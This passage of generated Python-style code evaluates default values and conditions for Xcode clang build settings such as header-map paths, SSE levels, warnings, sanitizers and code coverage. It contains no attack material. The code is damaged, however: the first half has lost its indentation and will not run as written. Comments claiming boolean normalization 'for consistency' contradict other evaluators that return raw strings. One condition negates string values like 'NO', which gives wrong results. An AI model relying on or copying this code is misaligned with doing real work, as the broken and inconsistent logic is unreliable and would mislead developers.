if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-project-headers.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_PRODUCT_HEADERS_VFS_FILE__DefaultValue(xcconfigs, id_configs):
# $(PROJECT_TEMP_DIR)/all-product-headers.yaml
used_user_content = False
eval_val_0 = ""
eval_key_0 = "PROJECT_TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, "{eval_val_0}/all-product-headers.yaml".format(eval_val_0 = eval_val_0))
def _com_apple_compilers_llvm_clang_1_0__USE_HEADER_SYMLINKS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADER_SYMLINKS_DIR__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME).hdrs
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}.hdrs".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__GCC_USE_GCC3_PFE_SUPPORT__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_PFE_FILE_C_DIALECTS__DefaultValue(xcconfigs, id_configs):
# c objective-c c++ objective-c++
return (False, "c objective-c c++ objective-c++")
def _com_apple_compilers_llvm_clang_1_0__ENABLE_APPLE_KEXT_CODE_GENERATION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_PARAMETER__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VARIABLE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_VALUE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_EXCEPTIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_OBJC_EXCEPTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_CW_ASM_SYNTAX__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_UNROLL_LOOPS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__Condition(xcconfigs, id_configs):
# $(LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS) == NO
used_user_content = False
eval_val_0 = ""
eval_key_0 = "LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "NO"))
def _com_apple_compilers_llvm_clang_1_0__GCC_FAST_MATH__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_STRICT_ALIASING__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_INSTRUMENT_PROGRAM_FLOW_ARCS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_TEST_COVERAGE_FILES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ALLOW_INCOMPLETE_PROTOCOL__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_INVALID_OFFSETOF_MACRO__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_CLANG) != YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_CLANG"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "YES"))
def _com_apple_compilers_llvm_clang_1_0__GCC_MACOSX_VERSION_MIN__DefaultValue(xcconfigs, id_configs):
# $($(DEPLOYMENT_TARGET_SETTING_NAME))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = eval_val_0
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__Condition(xcconfigs, id_configs):
# $(GCC_GENERATE_DEBUGGING_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_GENERATE_DEBUGGING_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
    # A bare $(VAR) condition is true when the setting is YES; normalize to a
    # boolean for consistency with the other Condition evaluators.
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__GCC_DEBUG_INFORMATION_FORMAT__DefaultValue(xcconfigs, id_configs):
# $(DEBUG_INFORMATION_FORMAT)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEBUG_INFORMATION_FORMAT"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__Condition(xcconfigs, id_configs):
# $(GCC_GENERATE_DEBUGGING_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_GENERATE_DEBUGGING_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
    # A bare $(VAR) condition is true when the setting is YES; normalize to a
    # boolean for consistency with the other Condition evaluators.
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_DEBUG_INFORMATION_LEVEL__DefaultValue(xcconfigs, id_configs):
# default
return (False, "default")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE3_EXTENSIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE41_EXTENSIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_SSE42_EXTENSIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_YES__DefaultValue(xcconfigs, id_configs):
# sse3
return (False, "sse3")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_NO__DefaultValue(xcconfigs, id_configs):
# default
return (False, "default")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_YES__DefaultValue(xcconfigs, id_configs):
# ssse3
return (False, "ssse3")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_NO__DefaultValue(xcconfigs, id_configs):
# $(DEFAULT_SSE_LEVEL_3_$(GCC_ENABLE_SSE3_EXTENSIONS))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_ENABLE_SSE3_EXTENSIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFAULT_SSE_LEVEL_3_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_YES__DefaultValue(xcconfigs, id_configs):
# sse4.1
return (False, "sse4.1")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_1_NO__DefaultValue(xcconfigs, id_configs):
# $(DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_$(GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFAULT_SSE_LEVEL_3_SUPPLEMENTAL_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_YES__DefaultValue(xcconfigs, id_configs):
# sse4.2
return (False, "sse4.2")
def _com_apple_compilers_llvm_clang_1_0__DEFAULT_SSE_LEVEL_4_2_NO__DefaultValue(xcconfigs, id_configs):
# $(DEFAULT_SSE_LEVEL_4_1_$(GCC_ENABLE_SSE41_EXTENSIONS))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_ENABLE_SSE41_EXTENSIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFAULT_SSE_LEVEL_4_1_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__CLANG_X86_VECTOR_INSTRUCTIONS__DefaultValue(xcconfigs, id_configs):
# $(DEFAULT_SSE_LEVEL_4_2_$(GCC_ENABLE_SSE42_EXTENSIONS))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_ENABLE_SSE42_EXTENSIONS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFAULT_SSE_LEVEL_4_2_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_compilers_llvm_clang_1_0__GCC_SYMBOLS_PRIVATE_EXTERN__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_INLINES_ARE_PRIVATE_EXTERN__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_THREADSAFE_STATICS__DefaultValue(xcconfigs, id_configs):
    # YES
    return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_POINTER_SIGNEDNESS__DefaultValue(xcconfigs, id_configs):
    # YES
    return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_NEWLINE__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_IMPLICIT_SIGN_CONVERSION__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_64_TO_32_BIT_CONVERSION__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INFINITE_RECURSION__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_MOVE__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_COMMA__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_STRICT_PROTOTYPES__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_RANGE_LOOP_ANALYSIS__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SEMICOLON_BEFORE_METHOD_BODY__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNGUARDED_AVAILABILITY__DefaultValue(xcconfigs, id_configs):
    # YES
    return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_OBJC_ABI_VERSION__DefaultValue(xcconfigs, id_configs):
    # $(OBJC_ABI_VERSION)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "OBJC_ABI_VERSION"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__GCC_OBJC_LEGACY_DISPATCH__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_OPTIMIZATION_PROFILE_FILE__DefaultValue(xcconfigs, id_configs):
    # $(SRCROOT)/OptimizationProfiles/$(PROJECT_NAME).profdata
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "SRCROOT"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    eval_val_1 = ""
    eval_key_1 = "PROJECT_NAME"
    if eval_key_1 in xcconfigs:
        eval_val_1 = xcconfigs[eval_key_1]
        used_user_content = True
    elif eval_key_1 in id_configs:
        opt = id_configs[eval_key_1]
        if "DefaultValue" in opt:
            (eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_1_used_user_content
    return (used_user_content, "{eval_val_0}/OptimizationProfiles/{eval_val_1}.profdata".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__Condition(xcconfigs, id_configs):
    # ! $(CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING) && ! $(CLANG_COVERAGE_MAPPING)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "CLANG_INSTRUMENT_FOR_OPTIMIZATION_PROFILING"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    eval_val_1 = ""
    eval_key_1 = "CLANG_COVERAGE_MAPPING"
    if eval_key_1 in xcconfigs:
        eval_val_1 = xcconfigs[eval_key_1]
        used_user_content = True
    elif eval_key_1 in id_configs:
        opt = id_configs[eval_key_1]
        if "DefaultValue" in opt:
            (eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_1_used_user_content
    return (used_user_content, (not eval_val_0 and not eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CLANG_USE_OPTIMIZATION_PROFILE__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CODE_COVERAGE__DefaultValue(xcconfigs, id_configs):
    # YES
    return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__Condition(xcconfigs, id_configs):
    # $(CLANG_ENABLE_CODE_COVERAGE)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "CLANG_ENABLE_CODE_COVERAGE"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0))
def _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_COVERAGE_MAPPING_LINKER_ARGS__DefaultValue(xcconfigs, id_configs):
    # $(CLANG_COVERAGE_MAPPING)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "CLANG_COVERAGE_MAPPING"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__Condition(xcconfigs, id_configs):
    # $(ENABLE_BITCODE) == YES
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "ENABLE_BITCODE"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_BITCODE_GENERATION_MODE__DefaultValue(xcconfigs, id_configs):
    # $(BITCODE_GENERATION_MODE)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "BITCODE_GENERATION_MODE"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER__DefaultValue(xcconfigs, id_configs):
    # $(ENABLE_ADDRESS_SANITIZER)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "ENABLE_ADDRESS_SANITIZER"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__Condition(xcconfigs, id_configs):
    # $(CLANG_ADDRESS_SANITIZER) == YES
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "CLANG_ADDRESS_SANITIZER"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_CONTAINER_OVERFLOW__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__Condition(xcconfigs, id_configs):
    # $(CLANG_ADDRESS_SANITIZER) == YES
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "CLANG_ADDRESS_SANITIZER"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_USE_AFTER_SCOPE__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__Condition(xcconfigs, id_configs):
    # $(CLANG_ADDRESS_SANITIZER) == YES
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "CLANG_ADDRESS_SANITIZER"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY__DefaultValue(xcconfigs, id_configs):
    # $(ENABLE_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "ENABLE_ADDRESS_SANITIZER_ALLOW_ERROR_RECOVERY"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER__DefaultValue(xcconfigs, id_configs):
    # $(ENABLE_UNDEFINED_BEHAVIOR_SANITIZER)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "ENABLE_UNDEFINED_BEHAVIOR_SANITIZER"
